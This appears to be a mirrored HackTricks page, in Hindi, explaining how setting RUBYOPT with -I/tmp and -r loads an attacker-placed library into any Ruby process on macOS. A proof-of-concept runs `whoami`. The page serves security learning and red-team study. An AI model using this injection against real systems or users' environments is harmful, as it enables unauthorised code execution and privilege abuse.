Mirrors/hacktricks
2
0
Fork 0
mirror of https://github.com/carlospolop/hacktricks synced 2024-11-15 17:28:13 +00:00
Code Issues Projects Releases Packages Wiki Activity
hacktricks/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-ruby-applications-injection.md

4.9 KiB
Raw Blame History

macOS Ruby एप्लिकेशन्स इंजेक्शन

AWS हैकिंग सीखें शून्य से लेकर हीरो तक htARTE (HackTricks AWS Red Team Expert) के साथ!

HackTricks का समर्थन करने के अन्य तरीके:

RUBYOPT

इस env वेरिएबल का उपयोग करके जब भी ruby निष्पादित होती है तो उसमें नए पैरामीटर्स जोड़ना संभव है। हालांकि पैरामीटर -e का उपयोग ruby कोड निष्पादित करने के लिए नहीं किया जा सकता, पैरामीटर्स -I और -r का उपयोग करके लाइब्रेरीज के लोड पथ में एक नया फोल्डर जोड़ना और फिर लोड करने के लिए एक लाइब्रेरी निर्दिष्ट करना संभव है।

/tmp में लाइब्रेरी inject.rb बनाएं:

{% code title="inject.rb" %}

puts `whoami`

{% endcode %}

कहीं भी एक रूबी स्क्रिप्ट बनाएं जैसे:

{% code title="hello.rb" %}

puts 'Hello, World!'

{% endcode %}

फिर एक मनमानी रूबी स्क्रिप्ट बनाएं और इसे लोड करें:

RUBYOPT="-I/tmp -rinject" ruby hello.rb

मजेदार तथ्य, यह पैरामीटर --disable-rubyopt के साथ भी काम करता है:

RUBYOPT="-I/tmp -rinject" ruby hello.rb --disable-rubyopt
शून्य से नायक तक AWS हैकिंग सीखें htARTE (HackTricks AWS Red Team Expert) के साथ!

HackTricks का समर्थन करने के अन्य तरीके: